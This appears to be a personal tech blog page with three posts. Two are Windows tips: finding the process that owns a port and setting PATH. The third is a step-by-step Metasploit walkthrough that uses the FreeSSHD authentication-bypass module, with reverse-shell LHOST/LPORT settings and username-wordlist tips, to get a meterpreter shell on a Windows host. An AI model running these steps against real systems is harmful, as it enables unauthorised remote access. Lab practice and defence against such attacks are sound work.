JohnKlann / Posts tagged "cygwin"

How to check if a port is in Use and What Process is running on it

Here is a really simple way to check whether a port is in use and by what process.

Method 1 CMD:

  1. Open an Admin Command Prompt and run:
     netstat -ano | findstr "portnumber"
  2. Example using the default RDP port:
     netstat -ano | findstr "3389"
  3. Output:
     (screenshot: windows_command_prompt_netstat_ano_rdp_port)

Method 2 PowerShell:

  1. Open an Admin PowerShell Prompt and run:
     netstat -ano | findstr "portnumber" | Select-String -Pattern "\d+$" -AllMatches | % {$_.Matches } | foreach { tasklist | Select-String -Pattern $_.Value } | Get-Unique
  2. Example using port 80:
     Note: this could probably be a lot cleaner but hey, I did it in 5 minutes in one line :) !
     netstat -ano | findstr "80" | Select-String -Pattern "\d+$" -AllMatches | % {$_.Matches } | foreach { tasklist | Select-String -Pattern $_.Value } | Get-Unique
  3. Output:
     (screenshot: windows_powershell_netstat_ano_port_number_tasklist_processname_process_stats)

Method 3 CMD with Cygwin:

  1. This will get all of the processes running on a particular port.
     Note: you will need the Cygwin bin directory in your PATH. See how to do this here: How to add environment Paths via command line (cmd, powershell).
  2. Open an Admin cmd Prompt and run:
     for /f "delims=" %a in ('netstat -ano ^| grep "portnumber" ^| grep -m1 -oP "[\d]{1,6}$"') do @set pid=%a | tasklist | grep %a
  3. Example using port 80:
     for /f "delims=" %a in ('netstat -ano ^| grep "80" ^| grep -m1 -oP "[\d]{1,6}$"') do @set pid=%a | tasklist | grep %a
  4. Output:
     (screenshot: windows_command_prompt_cygwin_netstat_ano_grep_port_number_tasklist_processname)
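As an added example that is not from the original post, here is a PowerShell function that does what the Method 2 and Method 3 one-liners do, but anchors the match on the local-address column of the same netstat -ano output, so asking for port 80 does not also return 8080, 1080 or any address that happens to contain "80" the way findstr "80" / grep "80" do. The function name Get-PortOwner is chosen here; run it from an elevated prompt so the PID-to-process lookup works for services owned by other accounts.

```powershell
# Added example (not from the original post): resolve the process behind a port
# by parsing `netstat -ano` rows exactly instead of substring-matching the number.
function Get-PortOwner {
    param(
        [Parameter(Mandatory)][int]$Port,
        [switch]$ListeningOnly        # keep only rows in the LISTENING state
    )
    # netstat -ano rows: Proto  Local Address  Foreign Address  [State]  PID
    # The port is anchored between ':' and whitespace; UDP rows have no State
    # column, so that group is optional.
    $pattern = '^\s*(TCP|UDP)\s+(\S+):' + $Port + '\s+(\S+)(?:\s+([A-Z_]+))?\s+(\d+)\s*$'

    netstat -ano | ForEach-Object {
        if ($_ -match $pattern) {
            $proto    = $Matches[1]
            $state    = $Matches[4]               # $null for UDP rows
            $ownerPid = [int]$Matches[5]          # $PID itself is read-only in PowerShell
            if ($ListeningOnly -and $state -ne 'LISTENING') { return }

            # PID 0 is the placeholder netstat shows for sockets no process owns any more
            $proc = if ($ownerPid -ne 0) { Get-Process -Id $ownerPid -ErrorAction SilentlyContinue }
            [pscustomobject]@{
                Proto   = $proto
                Local   = "$($Matches[2]):$Port"
                State   = $state
                PID     = $ownerPid
                Process = if ($proc) { $proc.ProcessName } else { '(exited, PID 0, or access denied)' }
                Path    = $proc.Path              # image path helps spot an unexpected listener
            }
        }
    } | Sort-Object Proto, PID
}

# Same two cases as the post: the default RDP port, and port 80 listeners only.
Get-PortOwner -Port 3389
Get-PortOwner -Port 80 -ListeningOnly
```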
jklann

How to add environment Paths via command line (cmd, powershell)

Here’s a quick one lol.

Quick Note: This will temporarily set the environment PATH within that shell only. If you want a permanent solution, you will have to add it through the Windows environment variables configuration and then log off and back on.

  1. In a CMD or PowerShell prompt run this command:
     Syntax:
     PATH %PATH%;c:\path\you\want\to\add\
  2. Example using the Cygwin bin directory:
     PATH %PATH%;c:\dev\cyg\bin\
  3. Output:
     (screenshot: windows_command_prompt_cmd_powershell_prompt_ps_set_environement_path)

jklann

Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found an interesting exploit in Metasploit today, mainly out of boredom, and I figured I would share it here. Below you will find a step-by-step of how to use Metasploit to exploit FreeSSHD on Windows to get a meterpreter shell.

start: FreeSSHD on your Windows victim box and check for any custom ports.

(screenshot: freesshd_configurations)

start: msfconsole in Kali

(screenshot: msfconsole)

search: ssh

(screenshot: search_ssh)

copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

(screenshot: use_exploit_options)

run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

(screenshot: exploit_settings)

run: exploit

(screenshot: exploit_shell)

Note: This exploit uses a username list for the attack; if the user that the SSH service authenticates is not in this list, the exploit won’t work. However, there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: Also, you can always find larger username lists and add them to the list that Metasploit uses, located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt”, or you can change this path to point at your own list using the USER_FILE option:

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built-in wordlists, which you can find at the following location:

ex: /usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution: if you are trying to protect against this attack, use an unusual, hard-to-guess username, or use Cygwin sshd on Windows instead.

jklann